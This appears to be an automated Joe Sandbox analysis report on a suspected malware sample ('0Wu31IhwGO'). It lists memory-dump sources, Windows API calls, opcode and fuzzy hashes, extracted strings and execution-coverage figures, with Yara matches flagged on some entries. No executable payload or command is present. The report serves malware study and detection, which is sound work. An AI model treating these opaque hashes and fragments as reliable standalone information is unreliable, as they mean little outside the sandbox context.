                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              APIs
                                                              • GetModuleHandleW.KERNELBASE(00000000), ref: 00EAB47E
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: HandleModule
                                                              • String ID:
                                                              • API String ID: 4139908857-0
                                                              • Opcode ID: bd693189a51c04780dedd3d01f3a3ac461c2099982c477cc2c71ffb25b751fd6
                                                              • Instruction ID: 05dbc774677f06ff40a7f9c0ef4c8abdfe89afd4bfa5594b3265bff1589ba1c9
                                                              • Opcode Fuzzy Hash: bd693189a51c04780dedd3d01f3a3ac461c2099982c477cc2c71ffb25b751fd6
                                                              • Instruction Fuzzy Hash: DD11DFB6C003498FCB20CF9AC844A9EFBF8EB89324F14845AD429B7211D379A545CFA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: d514ff98c518782a048041856f74212ca0a1a2e8470bfcaab9c1327e3aa05727
                                                              • Instruction ID: b2311458e25760f28a515cd9cff664c96b66a88e60ef210ecf4c0f20ec1fbcf6
                                                              • Opcode Fuzzy Hash: d514ff98c518782a048041856f74212ca0a1a2e8470bfcaab9c1327e3aa05727
                                                              • Instruction Fuzzy Hash: D8212571608240DFCB05DF14EDC0B26BF65FB98328F24C569E9092B256C73AD816CAA1
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: bb9115cd66fd9349b955ae4fc0913eff8715c91c995b4d68eca6fd9950698e21
                                                              • Instruction ID: e4e07b82e3eca14a8330504c2eb9feee96ec3887934b5c8b34b88eab19333e5c
                                                              • Opcode Fuzzy Hash: bb9115cd66fd9349b955ae4fc0913eff8715c91c995b4d68eca6fd9950698e21
                                                              • Instruction Fuzzy Hash: DD213779508300DFCB21DF54DDC0B26BB65FB84319F20C96DDC095B266C336D84ACA61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 339eb892ac3bcf322a46a5416b92466146356b0bcae326c6675bfa531c64ea36
                                                              • Instruction ID: 399072fe606c36812b3e6966c483443464d89abf31faa40985d555bcbbfbddfd
                                                              • Opcode Fuzzy Hash: 339eb892ac3bcf322a46a5416b92466146356b0bcae326c6675bfa531c64ea36
                                                              • Instruction Fuzzy Hash: 7F21F575508200DFDB25DF14D9C4B16BB66EB84325F24C96DDD095B296C33AD80BCA61
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 0bd6bf657ea5ffab311917efd228434294f2b82b6dbe2e00d7a97e3b66afadc7
                                                              • Instruction ID: a675fb932a6f8cffe095da753e2f51955db23d77821dfee34f62fbccc3963d87
                                                              • Opcode Fuzzy Hash: 0bd6bf657ea5ffab311917efd228434294f2b82b6dbe2e00d7a97e3b66afadc7
                                                              • Instruction Fuzzy Hash: 2921537550D3808FDB12CF24D994715BF71EB46314F28C5EAD8498B6A7C33A980ACB62
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675357122.0000000000E5D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E5D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e5d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675298271.0000000000E4D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00E4D000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_e4d000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: {#L
                                                              • API String ID: 0-1361971085
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: {#L
                                                              • API String ID: 0-1361971085
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 98R
                                                              • API String ID: 0-576591972
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: iUfo
                                                              • API String ID: 0-3820436262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: iUfo
                                                              • API String ID: 0-3820436262
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: w7e^
                                                              • API String ID: 0-1657886525
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: 0ni
                                                              • API String ID: 0-1488673370
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1675618718.0000000000EA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EA0000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_ea0000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: ce30d23feccfed93f44dc7a0ec009996b25336bf6ccfde0e7f32c67158a6f90a
                                                              • Instruction ID: 92997c127787781495e059457e8496b11c8b96181265c84ca8440e2eb4ae1bac
                                                              • Opcode Fuzzy Hash: ce30d23feccfed93f44dc7a0ec009996b25336bf6ccfde0e7f32c67158a6f90a
                                                              • Instruction Fuzzy Hash: 724109B0D0420A9FDB44CFAAD4855EEFBF2BF89300F14C42AD419A7654D7389A41CF90
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 8e46dc5260ac9ada5163820e2357492970263ab5b0a07330e513b22111149fe6
                                                              • Instruction ID: 89a63c2429fc12ef2034b682cf31fe7a8b8abbf4de0899543ab3728980e9ab96
                                                              • Opcode Fuzzy Hash: 8e46dc5260ac9ada5163820e2357492970263ab5b0a07330e513b22111149fe6
                                                              • Instruction Fuzzy Hash: 5641E5B0D1520ADBDB44CFAAC4856EEFBF6BF89300F14C42AC419AB654D7389A41CF94
                                                              Memory Dump Source
                                                              • Source File: 00000000.00000002.1680672599.0000000007370000.00000040.00000800.00020000.00000000.sdmp, Offset: 07370000, based on PE: false
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_0_2_7370000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: becf58e48e856e2187abbdcddcdc76b94e7ca2a1dd6e2ef3f43c9a13808a0a26
                                                              • Instruction ID: 78836d6128da0e6a8ced40e41dece172ca27cab309d1fba01893cf861f112118
                                                              • Opcode Fuzzy Hash: becf58e48e856e2187abbdcddcdc76b94e7ca2a1dd6e2ef3f43c9a13808a0a26
                                                              • Instruction Fuzzy Hash: 1721CCB1E006589BEB58CF6BDC0179EFAF7AFC9300F18C07AD418A6254EB345A458F55

                                                              Execution Graph

                                                              Execution Coverage:1.2%
                                                              Dynamic/Decrypted Code Coverage:5.1%
                                                              Signature Coverage:8%
                                                              Total number of Nodes:138
                                                              Total number of Limit Nodes:11

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction ID: 122384901a9c5e31b0cbf47cd83ed5cb9323d92cb62f98cf8b450b2778bc3db3
                                                              • Opcode Fuzzy Hash: b799f33cdfcceec68cf2461573a55d2e37cccfb65537d172954ac166eadf2d1b
                                                              • Instruction Fuzzy Hash: D60171B1E0420DBBDF10DBE1DC42FDEB3789B14308F4081AAE90897241F639EB588B95

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 414 42c953-42c989 call 404643 call 42db53 NtClose
                                                              APIs
                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042C984
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Close
                                                              • String ID:
                                                              • API String ID: 3535843008-0
                                                              • Opcode ID: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction ID: a1a1041c0e6c1b94269db6ff4cf73d3451205fe7691f058a31b8fa4964ffe1e3
                                                              • Opcode Fuzzy Hash: 2f083958855e6b39986ef7b53346a4094405c7a33e0ff299f3daded4b7834c37
                                                              • Instruction Fuzzy Hash: 2EE08676300614BBD510FA5ADC01F97775CEFC6714F404419FA4867341D675B91487F4
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                                                              • Instruction ID: 54a94143255f7bc2a3254bdae96c69da31920ee960dee43c8729d1ec4aa2afd0
                                                              • Opcode Fuzzy Hash: c6eca65387f8cbd2d3c2ecae69a11608095565f434516c40ee3437ed5c8a0c33
                                                              • Instruction Fuzzy Hash: 249002A5702400039105719C4428616400AD7E0206B95C061E1014590DC52589956225
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                                                              • Instruction ID: f193408a96201cc406d6266fe2dc7023656c9b259da8def7772700b1ec20108f
                                                              • Opcode Fuzzy Hash: de84c5f1486a8744120141c62cd42a792421830de351d96922f841ea01fffa41
                                                              • Instruction Fuzzy Hash: 9890027570140413E111719C45187070009D7D0246FD5C452A0424558DD6568A56A221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                                                              • Instruction ID: 715e9fe4aa3288be8eb4ff8cccbe8c5c67837b29eccb0878c366be8cdb5b50a0
                                                              • Opcode Fuzzy Hash: ff51e7a7a7f54927ac60b3b70d5913199a773f50f37a3c314737d6c173f49829
                                                              • Instruction Fuzzy Hash: 4090027570148802E110719C841874A0005D7D0306F99C451A4424658DC69589957221
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              • Opcode ID: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
                                                              • Instruction ID: 9eb7ceefee369cdea40d228d93f8d639d43af6248c8c9af65430fdee15c0a0e2
                                                              • Opcode Fuzzy Hash: 1d9cac39d44b0b58d2998c6013f9c15776d01e32050135424077ffa3ae8e5779
                                                              • Instruction Fuzzy Hash: BA900275B0550402E100719C45287061005D7D0206FA5C451A0424568DC7958A5566A2

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction ID: c654e7dd82306ad07be20f2182398129074d27dccdf197e7b8b500296daea260
                                                              • Opcode Fuzzy Hash: d8bb71b3de400eed59a08beff8e757dd903ada585e85bf85bc0fb80483de176b
                                                              • Instruction Fuzzy Hash: 6A21F972E4421C7EEB01AE959C82DEF7B7CEF40798B40816AF904A7241D6389E1687E5

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction ID: 934fb77fa0409c7874f7a2f8fe5ac0ceccbab11669475182c5f65d5113228a07
                                                              • Opcode Fuzzy Hash: 8d6bffc5187429553e2ad7040074804356c752e35f2aec9c3f1fcfce86f7cced
                                                              • Instruction Fuzzy Hash: 1D1108B1D4021C7AEB10ABE19CC1DEF7B7CDF41798F408069FA04B7200D6785E068BA5

                                                              Control-flow Graph

                                                              APIs
                                                              • PostThreadMessageW.USER32(UQ63g7r-,00000111,00000000,00000000), ref: 00414427
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: MessagePostThread
                                                              • String ID: UQ63g7r-$UQ63g7r-
                                                              • API String ID: 1836367815-2341035416
                                                              • Opcode ID: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction ID: 7656ebaa64e068870cd233fd54207e833a46b1e9e0b7fb7ddf8ec8f242163898
                                                              • Opcode Fuzzy Hash: 3c4c82ffe9e2637f9c0b03e17c2ef05438faead3bb8494bc245809be69176afb
                                                              • Instruction Fuzzy Hash: CF01D2B2D4021C7AEB10ABE19CC2DEF7B7CDF40798F408069FA04B7240D6785E068BA5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID:
                                                              • String ID:
                                                              • API String ID:
                                                              • Opcode ID: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction ID: c5951bf59670ed95c8a229a69371e0f0c9dc29fdd02334928d99ddc3ca0f2906
                                                              • Opcode Fuzzy Hash: 192c4f8d791a74f5fc4a3e9ce53003c0e739193646856a7bd5574ecafb04c77f
                                                              • Instruction Fuzzy Hash: 29219EB67442051FC315CE64EC81BF9B734EB92325F11029AF904CF381E6255D56C7E5

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              APIs
                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417BD5
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: Load
                                                              • String ID:
                                                              • API String ID: 2234796835-0
                                                              • Opcode ID: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction ID: 00ac5599f99533841f8bda13b0be2f1b62a40995406928251777d9fad877b1ce
                                                              • Opcode Fuzzy Hash: 05ce74115300aa1d0386c8a992e5465be043cc1f53121675ba303ccf5aa30423
                                                              • Instruction Fuzzy Hash: CD21AB3A70C10A9FCB118E24D844AEAFF74EF96719B2041DAD450CB342E226A98687D8

                                                              Control-flow Graph

                                                              • Executed
                                                              • Not Executed
                                                              control_flow_graph 404 42cc63-42cca1 call 404643 call 42db53 RtlAllocateHeap
                                                              APIs
                                                              • RtlAllocateHeap.NTDLL(?,0041E8EB,?,?,00000000,?,0041E8EB,?,?,?), ref: 0042CC9C
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: AllocateHeap
                                                              • String ID:
                                                              • API String ID: 1279760036-0
                                                              • Opcode ID: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction ID: 7c74d4e41703ecf2ac74f9d9b4895f51b419b40aa0f09aed774a1cc672b14946
                                                              • Opcode Fuzzy Hash: a629522e6cb8f85e8bdb182f51a111a0892afd8ed588c6852a699a7bde638c1b
                                                              • Instruction Fuzzy Hash: 3DE09AB22042187BCA14EF5AEC41F9B37ACEFC9710F004419FA08A7341D675BA108BB8

                                                              Control-flow Graph

                                                              control_flow_graph 409 42cca3-42cce1 call 404643 call 42db53 RtlFreeHeap
                                                              APIs
                                                              • RtlFreeHeap.NTDLL(00000000,00000004,00000000,3777EA40,00000007,00000000,00000004,00000000,004173E4,000000F4), ref: 0042CCDC
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: FreeHeap
                                                              • String ID:
                                                              • API String ID: 3298025750-0

                                                              Control-flow Graph

                                                              control_flow_graph 419 42cce3-42cd1f call 404643 call 42db53 ExitProcess
                                                              APIs
                                                              • ExitProcess.KERNEL32(?,00000000,00000000,?,9A0A6B39,?,?,9A0A6B39), ref: 0042CD1A
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2324217604.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_400000_0Wu31IhwGO.jbxd
                                                              Yara matches
                                                              Similarity
                                                              • API ID: ExitProcess
                                                              • String ID:
                                                              • API String ID: 621844428-0

                                                              Control-flow Graph

                                                              control_flow_graph 424 1392c0a-1392c0f 425 1392c1f-1392c26 LdrInitializeThunk 424->425 426 1392c11-1392c18 424->426
                                                              APIs
                                                              Memory Dump Source
                                                              • Source File: 00000004.00000002.2325226087.0000000001320000.00000040.00001000.00020000.00000000.sdmp, Offset: 01320000, based on PE: true
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_4_2_1320000_0Wu31IhwGO.jbxd
                                                              Similarity
                                                              • API ID: InitializeThunk
                                                              • String ID:
                                                              • API String ID: 2994545307-0
                                                              Strings
